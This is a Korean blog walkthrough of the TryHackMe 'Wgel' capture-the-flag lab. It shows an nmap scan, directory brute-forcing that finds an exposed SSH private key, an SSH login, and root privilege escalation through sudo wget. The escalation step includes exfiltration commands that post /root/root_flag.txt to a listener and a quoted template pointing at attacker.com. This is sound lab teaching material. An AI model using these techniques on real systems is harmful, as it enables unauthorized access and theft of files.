이번 CTF 문제는 플레그를 검열처리 후 올리겠습니다
앞으로도 쭉 그럴거같네요
양해부탁드립니다 !!
TASK 1 Wgel CTF
1. ANSWER : User flag 를 획득하세요
nmap 으로 스캔부터 해보겠습니다
nmap -sV -sC -A 10.10.208.33
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
현재 22 포트와 80 포트가 작동중입니다
웹페이지에 들어가보겠습니다
Apache2 페이지가 보입니다
gobuster 로 경로를 확인해보겠습니다
gobuster dir -u http://10.10.208.33/ -w /home/kali/Downloads/directory-list-2.3-medium.txt -v
http://10.10.208.33/sitemap/
그 이외
.ssh
사이트맵 경로로 이동해보겠습니다
간단한 웹페이지가 보입니다
별다른건 없는거 같으니
.ssh 경로로 들어가봅시다
id_rsa
들어가보니
RSA 키가 나옵니다
CTF 를 많이 풀다보면 이런종류에 문제가 나와도 뭘해야되는건지 알게되네요 ㅎㅎ
RSA 키로 로그인을 해보겠습니다
nano 편집기로 저장후
chmod 600 Wgel_rsa
chmod 로 Wgel_rsa 를 권한상승후
로그인을 해주겠습니다
ssh jessie@10.10.208.33 -i Wgel_rsa
???
오 좀 생각보다 빨리 플레그를 얻어서 깜짝 놀랐네요
경로는 Documents 에 있었습니다
2. ANSWER : Root flag 를 획득하세요
권한상승을 해줄겁니다
그러기 위해선
https://gtfobins.github.io/gtfobins/wget/#shell
이자료를 참고하여 Root flag 를 획득해보겠습니다
파일 업로드 취약점을 활용하여 플레그를 얻어봅시다
sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.10.208.33:1234
먼저 wget 으로 root_flag.txt 파일을 지정한후
아이피와 포트를 적어 nc 로 쉘을 얻어보겠습니다
연결을 시도했는데 실패했다 뜹니다
Troubleshooting
다시 명령어를 확인해보겠습니다
URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL
http 를 빼고 그냥 아이피와 포트만 적으면 어떨까
마찬가지였습니다
알고보니 피해자 IP 로 nc 를 진행중이더라군요
ㅋㅋㅋㅋ
이렇게 해서 성공적으로 root 플레그 까지 획득했습니다
난이도 : 1.5/10
한줄평 : 쉬운 CTF 문제
'TryHackMe | CTF' 카테고리의 다른 글
TryHackMe | Relevant - OSCP 챌린지 (4) | 2024.10.20 |
---|---|
TryHackMe | Year of the Rabbit - 모의해킹 CTF (1) | 2024.10.12 |
[TryHackMe] | Overpass - OSCP 모의해킹 (5) | 2024.10.03 |
TryHackMe | Bolt - 웹해킹 CTF (0) | 2024.09.29 |
TryHackMe | Startup - 모의해킹 CTF (0) | 2024.09.22 |